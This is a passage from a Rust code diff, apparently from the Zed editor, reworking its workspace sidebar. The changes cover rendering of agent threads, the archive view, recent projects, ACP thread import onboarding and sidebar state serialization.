Some(ix); + } else if this.hovered_thread_index == Some(ix) { + this.hovered_thread_index = None; + } + cx.notify(); + })) + .when(is_hovered && is_running, |this| { + this.action_slot( + IconButton::new("stop-thread", IconName::Stop) + .icon_size(IconSize::Small) + .icon_color(Color::Error) + .style(ButtonStyle::Tinted(TintColor::Error)) + .tooltip(Tooltip::text("Stop Generation")) + .on_click({ + let session_id = session_id_for_delete.clone(); + cx.listener(move |this, _, _window, cx| { + this.stop_thread(&session_id, cx); + }) + }), + ) + }) + .when(is_hovered && !is_running, |this| { + this.action_slot( + IconButton::new("archive-thread", IconName::Archive) + .icon_size(IconSize::Small) + .icon_color(Color::Muted) + .tooltip({ + let focus_handle = focus_handle.clone(); + move |_window, cx| { + Tooltip::for_action_in( + "Archive Thread", + &RemoveSelectedThread, + &focus_handle, + cx, + ) + } + }) + .on_click({ + let session_id = session_id_for_delete.clone(); + cx.listener(move |this, _, window, cx| { + this.archive_thread(&session_id, window, cx); + }) + }), + ) + }) + .on_click({ + cx.listener(move |this, _, window, cx| { + this.selection = None; + match &thread_workspace { + ThreadEntryWorkspace::Open(workspace) => { + this.activate_thread(metadata.clone(), workspace, window, cx); + } + ThreadEntryWorkspace::Closed(path_list) => { + this.open_workspace_and_activate_thread( + metadata.clone(), + path_list.clone(), + window, + cx, + ); + } + } + }) + }) + .into_any_element() + } + + fn render_filter_input(&self, cx: &mut Context) -> impl IntoElement { + div() + .min_w_0() + .flex_1() + .capture_action( + cx.listener(|this, _: &editor::actions::Newline, window, cx| { + this.editor_confirm(window, cx); + }), + ) + .child(self.filter_editor.clone()) + } + + fn render_recent_projects_button(&self, cx: &mut Context) -> impl IntoElement { + let multi_workspace = self.multi_workspace.upgrade(); + + let workspace = multi_workspace + .as_ref() + .map(|mw| mw.read(cx).workspace().downgrade()); + + let focus_handle = workspace + .as_ref() + .and_then(|ws| ws.upgrade()) + .map(|w| w.read(cx).focus_handle(cx)) + .unwrap_or_else(|| cx.focus_handle()); + + let sibling_workspace_ids: HashSet = multi_workspace + .as_ref() + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + + let popover_handle = self.recent_projects_popover_handle.clone(); + + PopoverMenu::new("sidebar-recent-projects-menu") + .with_handle(popover_handle) + .menu(move |window, cx| { + workspace.as_ref().map(|ws| { + SidebarRecentProjects::popover( + ws.clone(), + sibling_workspace_ids.clone(), + focus_handle.clone(), + window, + cx, + ) + }) + }) + .trigger_with_tooltip( + IconButton::new("open-project", IconName::OpenFolder) + .icon_size(IconSize::Small) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)), + |_window, cx| { + Tooltip::for_action( + "Add Project", + &OpenRecent { + create_new_window: false, + }, + cx, + ) + }, + ) + .offset(gpui::Point { + x: px(-2.0), + y: px(-2.0), + }) + .anchor(gpui::Corner::BottomRight) + } + + fn render_view_more( + &self, + ix: usize, + path_list: &PathList, + is_fully_expanded: bool, + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let path_list = path_list.clone(); + let id = SharedString::from(format!("view-more-{}", ix)); + + let label: SharedString = if is_fully_expanded { + "Collapse".into() + } else { + "View More".into() + }; + + ThreadItem::new(id, label) + .focused(is_selected) + .icon_visible(false) + .title_label_color(Color::Muted) + .on_click(cx.listener(move |this, _, _window, cx| { + this.selection = None; + if is_fully_expanded { + this.expanded_groups.remove(&path_list); + } else { + let current = this.expanded_groups.get(&path_list).copied().unwrap_or(0); + this.expanded_groups.insert(path_list.clone(), current + 1); + } + this.serialize(cx); + this.update_entries(cx); + })) + .into_any_element() + } + + fn new_thread_in_group( + &mut self, + _: &NewThreadInGroup, + window: &mut Window, + cx: &mut Context, + ) { + // If there is a keyboard selection, walk backwards through + // `project_header_indices` to find the header that owns the selected + // row. Otherwise fall back to the active workspace. + let workspace = if let Some(selected_ix) = self.selection { + self.contents + .project_header_indices + .iter() + .rev() + .find(|&&header_ix| header_ix <= selected_ix) + .and_then(|&header_ix| match &self.contents.entries[header_ix] { + ListEntry::ProjectHeader { key, .. } => { + self.workspace_for_group(key.path_list(), cx) + } + _ => None, + }) + } else { + // Use the currently active workspace. + self.multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()) + }; + + let Some(workspace) = workspace else { + return; + }; + + self.create_new_thread(&workspace, window, cx); + } + + fn create_new_thread( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + self.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); + + workspace.update(cx, |workspace, cx| { + if let Some(agent_panel) = workspace.panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.new_thread(&NewThread, window, cx); + }); + } + workspace.focus_panel::(window, cx); + }); + } + + fn render_draft_thread( + &self, + ix: usize, + is_active: bool, + worktrees: &[WorktreeInfo], + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let label: SharedString = if is_active { + self.active_draft_text(cx) + .unwrap_or_else(|| "Untitled Thread".into()) + } else { + "Untitled Thread".into() + }; + + let id = SharedString::from(format!("draft-thread-btn-{}", ix)); + + let thread_item = ThreadItem::new(id, label) + .icon(IconName::Plus) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.8))) + .worktrees( + worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .selected(true) + .focused(is_selected); + + div() + .on_mouse_down(gpui::MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .child(thread_item) + .into_any_element() + } + + fn render_new_thread( + &self, + ix: usize, + key: &ProjectGroupKey, + worktrees: &[WorktreeInfo], + is_selected: bool, + cx: &mut Context, + ) -> AnyElement { + let label: SharedString = DEFAULT_THREAD_TITLE.into(); + let path_list = key.path_list().clone(); + + let id = SharedString::from(format!("new-thread-btn-{}", ix)); + + let thread_item = ThreadItem::new(id, label) + .icon(IconName::Plus) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.8))) + .worktrees( + worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: wt.highlight_positions.clone(), + }) + .collect(), + ) + .selected(false) + .focused(is_selected) + .on_click(cx.listener(move |this, _, window, cx| { + this.selection = None; + if let Some(workspace) = this.workspace_for_group(&path_list, cx) { + this.create_new_thread(&workspace, window, cx); + } else { + this.open_workspace_for_group(&path_list, window, cx); + } + })); + + thread_item.into_any_element() + } + + fn render_no_results(&self, cx: &mut Context) -> impl IntoElement { + let has_query = self.has_filter_query(cx); + let message = if has_query { + "No threads match your search." + } else { + "No threads yet" + }; + + v_flex() + .id("sidebar-no-results") + .p_4() + .size_full() + .items_center() + .justify_center() + .child( + Label::new(message) + .size(LabelSize::Small) + .color(Color::Muted), + ) + } + + fn render_empty_state(&self, cx: &mut Context) -> impl IntoElement { + v_flex() + .id("sidebar-empty-state") + .p_4() + .size_full() + .items_center() + .justify_center() + .gap_1() + .track_focus(&self.focus_handle(cx)) + .child( + Button::new("open_project", "Open Project") + .full_width() + .key_binding(KeyBinding::for_action(&workspace::Open::default(), cx)) + .on_click(|_, window, cx| { + window.dispatch_action( + Open { + create_new_window: false, + } + .boxed_clone(), + cx, + ); + }), + ) + .child( + h_flex() + .w_1_2() + .gap_2() + .child(Divider::horizontal().color(ui::DividerColor::Border)) + .child(Label::new("or").size(LabelSize::XSmall).color(Color::Muted)) + .child(Divider::horizontal().color(ui::DividerColor::Border)), + ) + .child( + Button::new("clone_repo", "Clone Repository") + .full_width() + .on_click(|_, window, cx| { + window.dispatch_action(git::Clone.boxed_clone(), cx); + }), + ) + } + + fn render_sidebar_header( + &self, + no_open_projects: bool, + window: &Window, + cx: &mut Context, + ) -> impl IntoElement { + let has_query = self.has_filter_query(cx); + let sidebar_on_left = self.side(cx) == SidebarSide::Left; + let sidebar_on_right = self.side(cx) == SidebarSide::Right; + let not_fullscreen = !window.is_fullscreen(); + let traffic_lights = cfg!(target_os = "macos") && not_fullscreen && sidebar_on_left; + let left_window_controls = !cfg!(target_os = "macos") && not_fullscreen && sidebar_on_left; + let right_window_controls = + !cfg!(target_os = "macos") && not_fullscreen && sidebar_on_right; + let header_height = platform_title_bar_height(window); + + h_flex() + .h(header_height) + .mt_px() + .pb_px() + .when(left_window_controls, |this| { + this.children(Self::render_left_window_controls(window, cx)) + }) + .map(|this| { + if traffic_lights { + this.pl(px(ui::utils::TRAFFIC_LIGHT_PADDING)) + } else if !left_window_controls { + this.pl_1p5() + } else { + this + } + }) + .when(!right_window_controls, |this| this.pr_1p5()) + .gap_1() + .when(!no_open_projects, |this| { + this.border_b_1() + .border_color(cx.theme().colors().border) + .when(traffic_lights, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) + .child( + div().ml_1().child( + Icon::new(IconName::MagnifyingGlass) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .child(self.render_filter_input(cx)) + .child( + h_flex() + .gap_1() + .when( + self.selection.is_some() + && !self.filter_editor.focus_handle(cx).is_focused(window), + |this| this.child(KeyBinding::for_action(&FocusSidebarFilter, cx)), + ) + .when(has_query, |this| { + this.child( + IconButton::new("clear_filter", IconName::Close) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Clear Search")) + .on_click(cx.listener(|this, _, window, cx| { + this.reset_filter_editor_text(window, cx); + this.update_entries(cx); + })), + ) + }), + ) + }) + .when(right_window_controls, |this| { + this.children(Self::render_right_window_controls(window, cx)) + }) + } + + fn render_left_window_controls(window: &Window, cx: &mut App) -> Option { + platform_title_bar::render_left_window_controls( + cx.button_layout(), + Box::new(CloseWindow), + window, + ) + } + + fn render_right_window_controls(window: &Window, cx: &mut App) -> Option { + platform_title_bar::render_right_window_controls( + cx.button_layout(), + Box::new(CloseWindow), + window, + ) + } + + fn render_sidebar_toggle_button(&self, _cx: &mut Context) -> impl IntoElement { + let on_right = AgentSettings::get_global(_cx).sidebar_side() == SidebarSide::Right; + + sidebar_side_context_menu("sidebar-toggle-menu", _cx) + .anchor(if on_right { + gpui::Corner::BottomRight + } else { + gpui::Corner::BottomLeft + }) + .attach(if on_right { + gpui::Corner::TopRight + } else { + gpui::Corner::TopLeft + }) + .trigger(move |_is_active, _window, _cx| { + let icon = if on_right { + IconName::ThreadsSidebarRightOpen + } else { + IconName::ThreadsSidebarLeftOpen + }; + IconButton::new("sidebar-close-toggle", icon) + .icon_size(IconSize::Small) + .tooltip(Tooltip::element(move |_window, cx| { + v_flex() + .gap_1() + .child( + h_flex() + .gap_2() + .justify_between() + .child(Label::new("Toggle Sidebar")) + .child(KeyBinding::for_action(&ToggleWorkspaceSidebar, cx)), + ) + .child( + h_flex() + .pt_1() + .gap_2() + .border_t_1() + .border_color(cx.theme().colors().border_variant) + .justify_between() + .child(Label::new("Focus Sidebar")) + .child(KeyBinding::for_action(&FocusWorkspaceSidebar, cx)), + ) + .into_any_element() + })) + .on_click(|_, window, cx| { + if let Some(multi_workspace) = window.root::().flatten() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.close_sidebar(window, cx); + }); + } + }) + }) + } + + fn render_sidebar_bottom_bar(&mut self, cx: &mut Context) -> impl IntoElement { + let is_archive = matches!(self.view, SidebarView::Archive(..)); + let show_import_button = is_archive && !self.should_render_acp_import_onboarding(cx); + let on_right = self.side(cx) == SidebarSide::Right; + + let action_buttons = h_flex() + .gap_1() + .when(on_right, |this| this.flex_row_reverse()) + .when(show_import_button, |this| { + this.child( + IconButton::new("thread-import", IconName::ThreadImport) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Import ACP Threads")) + .on_click(cx.listener(|this, _, window, cx| { + this.show_archive(window, cx); + this.show_thread_import_modal(window, cx); + })), + ) + }) + .child( + IconButton::new("archive", IconName::Archive) + .icon_size(IconSize::Small) + .toggle_state(is_archive) + .tooltip(move |_, cx| { + Tooltip::for_action("Toggle Archived Threads", &ToggleArchive, cx) + }) + .on_click(cx.listener(|this, _, window, cx| { + this.toggle_archive(&ToggleArchive, window, cx); + })), + ) + .child(self.render_recent_projects_button(cx)); + + h_flex() + .p_1() + .gap_1() + .when(on_right, |this| this.flex_row_reverse()) + .justify_between() + .border_t_1() + .border_color(cx.theme().colors().border) + .child(self.render_sidebar_toggle_button(cx)) + .child(action_buttons) + } + + fn active_workspace(&self, cx: &App) -> Option> { + self.multi_workspace + .upgrade() + .map(|w| w.read(cx).workspace().clone()) + } + + fn show_thread_import_modal(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_workspace) = self.active_workspace(cx) else { + return; + }; + + let Some(agent_registry_store) = AgentRegistryStore::try_global(cx) else { + return; + }; + + let agent_server_store = active_workspace + .read(cx) + .project() + .read(cx) + .agent_server_store() + .clone(); + + let workspace_handle = active_workspace.downgrade(); + let multi_workspace = self.multi_workspace.clone(); + + active_workspace.update(cx, |workspace, cx| { + workspace.toggle_modal(window, cx, |window, cx| { + ThreadImportModal::new( + agent_server_store, + agent_registry_store, + workspace_handle.clone(), + multi_workspace.clone(), + window, + cx, ) - } - } + }); + }); } - fn render_editor( - &self, - editor: &Arc, - window: &mut Window, - cx: &mut Context>, - ) -> Div { - h_flex() - .h(Tab::container_height(cx)) + fn should_render_acp_import_onboarding(&self, cx: &App) -> bool { + let has_external_agents = self + .active_workspace(cx) + .map(|ws| { + ws.read(cx) + .project() + .read(cx) + .agent_server_store() + .read(cx) + .has_external_agents() + }) + .unwrap_or(false); + + has_external_agents && !AcpThreadImportOnboarding::dismissed(cx) + } + + fn render_acp_import_onboarding(&mut self, cx: &mut Context) -> impl IntoElement { + let description = + "Import threads from your ACP agents — whether started in Zed or another client."; + + let bg = cx.theme().colors().text_accent; + + v_flex() + .min_w_0() .w_full() - .px_2() - .gap_2() - .justify_between() - .border_b_1() + .p_2() + .border_t_1() .border_color(cx.theme().colors().border) + .bg(linear_gradient( + 360., + linear_color_stop(bg.opacity(0.06), 1.), + linear_color_stop(bg.opacity(0.), 0.), + )) .child( - Icon::new(IconName::MagnifyingGlass) - .color(Color::Muted) - .size(IconSize::Small), + h_flex() + .min_w_0() + .w_full() + .gap_1() + .justify_between() + .child(Label::new("Looking for ACP threads?")) + .child( + IconButton::new("close-onboarding", IconName::Close) + .icon_size(IconSize::Small) + .on_click(|_, _window, cx| AcpThreadImportOnboarding::dismiss(cx)), + ), + ) + .child(Label::new(description).color(Color::Muted).mb_2()) + .child( + Button::new("import-acp", "Import ACP Threads") + .full_width() + .style(ButtonStyle::OutlinedCustom(cx.theme().colors().border)) + .label_size(LabelSize::Small) + .start_icon( + Icon::new(IconName::ThreadImport) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click(cx.listener(|this, _, window, cx| { + this.show_archive(window, cx); + this.show_thread_import_modal(window, cx); + })), ) - .child(editor.render(window, cx)) } -} -pub struct Sidebar { - multi_workspace: Entity, - width: Pixels, - picker: Entity>, - _subscription: Subscription, - _project_subscriptions: Vec, - _agent_panel_subscriptions: Vec, - _thread_subscriptions: Vec, - #[cfg(any(test, feature = "test-support"))] - test_thread_infos: HashMap, - #[cfg(any(test, feature = "test-support"))] - test_recent_project_thread_titles: HashMap, - _fetch_recent_projects: Task<()>, -} + fn toggle_archive(&mut self, _: &ToggleArchive, window: &mut Window, cx: &mut Context) { + match &self.view { + SidebarView::ThreadList => self.show_archive(window, cx), + SidebarView::Archive(_) => self.show_thread_list(window, cx), + } + } -impl EventEmitter for Sidebar {} + fn show_archive(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_workspace) = self + .multi_workspace + .upgrade() + .map(|w| w.read(cx).workspace().clone()) + else { + return; + }; + let Some(agent_panel) = active_workspace.read(cx).panel::(cx) else { + return; + }; -impl Sidebar { - pub fn new( - multi_workspace: Entity, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let delegate = WorkspacePickerDelegate::new(multi_workspace.clone()); - let picker = cx.new(|cx| { - Picker::list(delegate, window, cx) - .max_height(None) - .show_scrollbar(true) - .modal(false) + let agent_server_store = active_workspace + .read(cx) + .project() + .read(cx) + .agent_server_store() + .downgrade(); + + let agent_connection_store = agent_panel.read(cx).connection_store().downgrade(); + + let archive_view = cx.new(|cx| { + ThreadsArchiveView::new( + active_workspace.downgrade(), + agent_connection_store.clone(), + agent_server_store.clone(), + window, + cx, + ) }); - let subscription = cx.observe_in( - &multi_workspace, + let subscription = cx.subscribe_in( + &archive_view, window, - |this, _multi_workspace, window, cx| { - this.update_entries(window, cx); + |this, _, event: &ThreadsArchiveViewEvent, window, cx| match event { + ThreadsArchiveViewEvent::Close => { + this.show_thread_list(window, cx); + } + ThreadsArchiveViewEvent::Unarchive { thread } => { + this.show_thread_list(window, cx); + this.activate_archived_thread(thread.clone(), window, cx); + } }, ); - let fetch_recent_projects = { - let picker = picker.downgrade(); - let fs = ::global(cx); - cx.spawn_in(window, async move |_this, cx| { - let projects = get_recent_projects(None, None, fs).await; - - cx.update(|window, cx| { - if let Some(picker) = picker.upgrade() { - picker.update(cx, |picker, cx| { - picker.delegate.set_recent_projects(projects, cx); - let query = picker.query(cx); - picker.update_matches(query, window, cx); - }); - } - }) - .log_err(); - }) - }; - - let mut this = Self { - multi_workspace, - width: DEFAULT_WIDTH, - picker, - _subscription: subscription, - _project_subscriptions: Vec::new(), - _agent_panel_subscriptions: Vec::new(), - _thread_subscriptions: Vec::new(), - #[cfg(any(test, feature = "test-support"))] - test_thread_infos: HashMap::new(), - #[cfg(any(test, feature = "test-support"))] - test_recent_project_thread_titles: HashMap::new(), - _fetch_recent_projects: fetch_recent_projects, - }; - this.update_entries(window, cx); - this + self._subscriptions.push(subscription); + self.view = SidebarView::Archive(archive_view.clone()); + archive_view.update(cx, |view, cx| view.focus_filter_editor(window, cx)); + self.serialize(cx); + cx.notify(); } - fn subscribe_to_projects( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Vec { - let projects: Vec<_> = self - .multi_workspace - .read(cx) - .workspaces() - .iter() - .map(|w| w.read(cx).project().clone()) - .collect(); - - projects - .iter() - .map(|project| { - cx.subscribe_in( - project, - window, - |this, _project, event, window, cx| match event { - ProjectEvent::WorktreeAdded(_) - | ProjectEvent::WorktreeRemoved(_) - | ProjectEvent::WorktreeOrderChanged => { - this.update_entries(window, cx); - } - _ => {} - }, - ) - }) - .collect() + fn show_thread_list(&mut self, window: &mut Window, cx: &mut Context) { + self.view = SidebarView::ThreadList; + self._subscriptions.clear(); + let handle = self.filter_editor.read(cx).focus_handle(cx); + handle.focus(window, cx); + self.serialize(cx); + cx.notify(); } +} - fn build_workspace_thread_entries( - &self, - multi_workspace: &MultiWorkspace, - cx: &App, - ) -> (Vec, usize) { - #[allow(unused_mut)] - let mut entries: Vec = multi_workspace - .workspaces() - .iter() - .enumerate() - .map(|(index, workspace)| WorkspaceThreadEntry::new(index, workspace, cx)) - .collect(); +impl WorkspaceSidebar for Sidebar { + fn width(&self, _cx: &App) -> Pixels { + self.width + } - #[cfg(any(test, feature = "test-support"))] - for (index, info) in &self.test_thread_infos { - if let Some(entry) = entries.get_mut(*index) { - entry.thread_info = Some(info.clone()); - } - } + fn set_width(&mut self, width: Option, cx: &mut Context) { + self.width = width.unwrap_or(DEFAULT_WIDTH).clamp(MIN_WIDTH, MAX_WIDTH); + cx.notify(); + } - (entries, multi_workspace.active_workspace_index()) + fn has_notifications(&self, _cx: &App) -> bool { + !self.contents.notified_threads.is_empty() } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_recent_projects( - &self, - projects: Vec, - cx: &mut Context, - ) { - self.picker.update(cx, |picker, _cx| { - picker.delegate.recent_projects = projects; - }); + fn is_threads_list_view_active(&self) -> bool { + matches!(self.view, SidebarView::ThreadList) } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_thread_info( - &mut self, - index: usize, - title: SharedString, - status: AgentThreadStatus, - ) { - self.test_thread_infos.insert( - index, - AgentThreadInfo { - title, - status, - icon: IconName::ZedAgent, - }, - ); + fn side(&self, cx: &App) -> SidebarSide { + AgentSettings::get_global(cx).sidebar_side() } - #[cfg(any(test, feature = "test-support"))] - pub fn set_test_recent_project_thread_title( - &mut self, - full_path: SharedString, - title: SharedString, - cx: &mut Context, - ) { - self.test_recent_project_thread_titles - .insert(full_path.clone(), title.clone()); - self.picker.update(cx, |picker, _cx| { - picker - .delegate - .recent_project_thread_titles - .insert(full_path, title); - }); + fn prepare_for_focus(&mut self, _window: &mut Window, cx: &mut Context) { + self.selection = None; + cx.notify(); } - fn subscribe_to_agent_panels( + fn toggle_thread_switcher( &mut self, + select_last: bool, window: &mut Window, cx: &mut Context, - ) -> Vec { - let workspaces: Vec<_> = self.multi_workspace.read(cx).workspaces().to_vec(); + ) { + self.toggle_thread_switcher_impl(select_last, window, cx); + } - workspaces - .iter() - .map(|workspace| { - if let Some(agent_panel) = workspace.read(cx).panel::(cx) { - cx.subscribe_in( - &agent_panel, - window, - |this, _, _event: &AgentPanelEvent, window, cx| { - this.update_entries(window, cx); - }, - ) - } else { - // Panel hasn't loaded yet — observe the workspace so we - // re-subscribe once the panel appears on its dock. - cx.observe_in(workspace, window, |this, _, window, cx| { - this.update_entries(window, cx); - }) - } - }) - .collect() + fn serialized_state(&self, _cx: &App) -> Option { + let serialized = SerializedSidebar { + width: Some(f32::from(self.width)), + collapsed_groups: self + .collapsed_groups + .iter() + .map(|pl| pl.serialize()) + .collect(), + expanded_groups: self + .expanded_groups + .iter() + .map(|(pl, count)| (pl.serialize(), *count)) + .collect(), + active_view: match self.view { + SidebarView::ThreadList => SerializedSidebarView::ThreadList, + SidebarView::Archive(_) => SerializedSidebarView::Archive, + }, + }; + serde_json::to_string(&serialized).ok() } - fn subscribe_to_threads( + fn restore_serialized_state( &mut self, + state: &str, window: &mut Window, cx: &mut Context, - ) -> Vec { - let workspaces: Vec<_> = self.multi_workspace.read(cx).workspaces().to_vec(); - - workspaces - .iter() - .filter_map(|workspace| { - let agent_panel = workspace.read(cx).panel::(cx)?; - let thread = agent_panel.read(cx).active_agent_thread(cx)?; - Some(cx.observe_in(&thread, window, |this, _, window, cx| { - this.update_entries(window, cx); - })) - }) - .collect() - } - - /// Reconciles the sidebar's displayed entries with the current state of all - /// workspaces and their agent threads. - fn update_entries(&mut self, window: &mut Window, cx: &mut Context) { - let multi_workspace = self.multi_workspace.clone(); - cx.defer_in(window, move |this, window, cx| { - if !this.multi_workspace.read(cx).multi_workspace_enabled(cx) { - return; + ) { + if let Some(serialized) = serde_json::from_str::(state).log_err() { + if let Some(width) = serialized.width { + self.width = px(width).clamp(MIN_WIDTH, MAX_WIDTH); } - - this._project_subscriptions = this.subscribe_to_projects(window, cx); - this._agent_panel_subscriptions = this.subscribe_to_agent_panels(window, cx); - this._thread_subscriptions = this.subscribe_to_threads(window, cx); - let (entries, active_index) = multi_workspace.read_with(cx, |multi_workspace, cx| { - this.build_workspace_thread_entries(multi_workspace, cx) - }); - - let had_notifications = !this.picker.read(cx).delegate.notified_workspaces.is_empty(); - this.picker.update(cx, |picker, cx| { - picker.delegate.set_entries(entries, active_index, cx); - let query = picker.query(cx); - picker.update_matches(query, window, cx); - }); - let has_notifications = !this.picker.read(cx).delegate.notified_workspaces.is_empty(); - if had_notifications != has_notifications { - multi_workspace.update(cx, |_, cx| cx.notify()); + self.collapsed_groups = serialized + .collapsed_groups + .into_iter() + .map(|s| PathList::deserialize(&s)) + .collect(); + self.expanded_groups = serialized + .expanded_groups + .into_iter() + .map(|(s, count)| (PathList::deserialize(&s), count)) + .collect(); + if serialized.active_view == SerializedSidebarView::Archive { + cx.defer_in(window, |this, window, cx| { + this.show_archive(window, cx); + }); } - }); - } -} - -impl WorkspaceSidebar for Sidebar { - fn width(&self, _cx: &App) -> Pixels { - self.width - } - - fn set_width(&mut self, width: Option, cx: &mut Context) { - self.width = width.unwrap_or(DEFAULT_WIDTH).clamp(MIN_WIDTH, MAX_WIDTH); + } cx.notify(); } - - fn has_notifications(&self, cx: &App) -> bool { - !self.picker.read(cx).delegate.notified_workspaces.is_empty() - } } +impl gpui::EventEmitter for Sidebar {} + impl Focusable for Sidebar { - fn focus_handle(&self, cx: &App) -> FocusHandle { - self.picker.read(cx).focus_handle(cx) + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() } } impl Render for Sidebar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let titlebar_height = ui::utils::platform_title_bar_height(window); - let ui_font = theme::setup_ui_font(window, cx); - let is_focused = self.focus_handle(cx).is_focused(window); + let _titlebar_height = ui::utils::platform_title_bar_height(window); + let ui_font = theme_settings::setup_ui_font(window, cx); + let sticky_header = self.render_sticky_header(window, cx); - let focus_tooltip_label = if is_focused { - "Focus Workspace" - } else { - "Focus Sidebar" - }; + let color = cx.theme().colors(); + let bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let no_open_projects = !self.contents.has_open_projects; + let no_search_results = self.contents.entries.is_empty(); v_flex() .id("workspace-sidebar") - .key_context("WorkspaceSidebar") + .key_context(self.dispatch_context(window, cx)) + .track_focus(&self.focus_handle) + .on_action(cx.listener(Self::select_next)) + .on_action(cx.listener(Self::select_previous)) + .on_action(cx.listener(Self::editor_move_down)) + .on_action(cx.listener(Self::editor_move_up)) + .on_action(cx.listener(Self::select_first)) + .on_action(cx.listener(Self::select_last)) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::expand_selected_entry)) + .on_action(cx.listener(Self::collapse_selected_entry)) + .on_action(cx.listener(Self::toggle_selected_fold)) + .on_action(cx.listener(Self::fold_all)) + .on_action(cx.listener(Self::unfold_all)) + .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(Self::remove_selected_thread)) + .on_action(cx.listener(Self::new_thread_in_group)) + .on_action(cx.listener(Self::toggle_archive)) + .on_action(cx.listener(Self::focus_sidebar_filter)) + .on_action(cx.listener(Self::on_toggle_thread_switcher)) + .on_action(cx.listener(|this, _: &OpenRecent, window, cx| { + this.recent_projects_popover_handle.toggle(window, cx); + })) .font(ui_font) .h_full() .w(self.width) - .bg(cx.theme().colors().surface_background) - .border_r_1() - .border_color(cx.theme().colors().border) - .child( - h_flex() - .flex_none() - .h(titlebar_height) - .w_full() - .mt_px() - .pb_px() - .pr_1() - .when_else( - cfg!(target_os = "macos") && !window.is_fullscreen(), - |this| this.pl(px(TRAFFIC_LIGHT_PADDING)), - |this| this.pl_2(), - ) - .justify_between() - .border_b_1() - .border_color(cx.theme().colors().border) - .child({ - let focus_handle = cx.focus_handle(); - IconButton::new("close-sidebar", IconName::WorkspaceNavOpen) - .icon_size(IconSize::Small) - .tooltip(Tooltip::element(move |_, cx| { + .bg(bg) + .when(self.side(cx) == SidebarSide::Left, |el| el.border_r_1()) + .when(self.side(cx) == SidebarSide::Right, |el| el.border_l_1()) + .border_color(color.border) + .map(|this| match &self.view { + SidebarView::ThreadList => this + .child(self.render_sidebar_header(no_open_projects, window, cx)) + .map(|this| { + if no_open_projects { + this.child(self.render_empty_state(cx)) + } else { + this.child( v_flex() - .gap_1() - .child( - h_flex() - .gap_2() - .justify_between() - .child(Label::new("Close Sidebar")) - .child(KeyBinding::for_action_in( - &ToggleWorkspaceSidebar, - &focus_handle, - cx, - )), - ) + .relative() + .flex_1() + .overflow_hidden() .child( - h_flex() - .pt_1() - .gap_2() - .border_t_1() - .border_color(cx.theme().colors().border_variant) - .justify_between() - .child(Label::new(focus_tooltip_label)) - .child(KeyBinding::for_action_in( - &FocusWorkspaceSidebar, - &focus_handle, - cx, - )), + list( + self.list_state.clone(), + cx.processor(Self::render_list_entry), + ) + .flex_1() + .size_full(), ) - .into_any_element() - })) - .on_click(cx.listener(|_this, _, _window, cx| { - cx.emit(SidebarEvent::Close); - })) - }) - .child( - IconButton::new("new-workspace", IconName::Plus) - .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("New Workspace", &NewWorkspaceInWindow, cx) - }) - .on_click(cx.listener(|this, _, window, cx| { - this.multi_workspace.update(cx, |multi_workspace, cx| { - multi_workspace.create_workspace(window, cx); - }); - })), - ), - ) - .child(self.picker.clone()) + .when(no_search_results, |this| { + this.child(self.render_no_results(cx)) + }) + .when_some(sticky_header, |this, header| this.child(header)) + .vertical_scrollbar_for(&self.list_state, window, cx), + ) + } + }), + SidebarView::Archive(archive_view) => this.child(archive_view.clone()), + }) + .when(self.should_render_acp_import_onboarding(cx), |this| { + this.child(self.render_acp_import_onboarding(cx)) + }) + .child(self.render_sidebar_bottom_bar(cx)) } } -#[cfg(test)] -mod tests { - use super::*; - use feature_flags::FeatureFlagAppExt as _; - use fs::FakeFs; - use gpui::TestAppContext; - use settings::SettingsStore; - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); - editor::init(cx); - cx.update_flags(false, vec!["agent-v2".into()]); - }); - } - - fn set_thread_info_and_refresh( - sidebar: &Entity, - multi_workspace: &Entity, - index: usize, - title: &str, - status: AgentThreadStatus, - cx: &mut gpui::VisualTestContext, - ) { - sidebar.update_in(cx, |s, _window, _cx| { - s.set_test_thread_info(index, SharedString::from(title.to_string()), status); - }); - multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); - cx.run_until_parked(); - } - - fn has_notifications(sidebar: &Entity, cx: &mut gpui::VisualTestContext) -> bool { - sidebar.read_with(cx, |s, cx| 